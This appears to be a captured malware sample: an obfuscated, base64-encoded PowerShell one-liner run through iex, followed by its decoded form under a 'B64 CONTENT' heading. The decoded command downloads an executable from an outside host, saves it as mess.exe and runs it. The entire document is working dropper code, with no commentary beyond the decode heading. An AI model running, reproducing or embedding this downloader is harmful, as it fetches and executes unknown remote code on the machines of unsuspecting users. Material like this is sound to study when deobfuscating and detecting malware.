iex([SystEM.texT.eNCOdiNg]::UtF8.GeTStRing([sYStem.COnveRt]::FROmBaSe64sTRiNg('CihOZXctT2JqZWN0IFN5U3RFTS5uZXQuV0ViY2xpRU50KS5ET3dubE9BREZJTGUoJ2h0dHA6Ly9jYWpvcy5pbi8weC8xLmV4ZScsJ21lc3MuZXhlJyk7U3RhcnQtUHJvY2VzcyAnbWVzcy5leGUnCgo=')));exit

##### B64 CONTENT #####


(New-Object SyStEM.net.WEbcliENt).DOwnlOADFILe('http://cajos.in/0x/1.exe','mess.exe');Start-Process 'mess.exe'

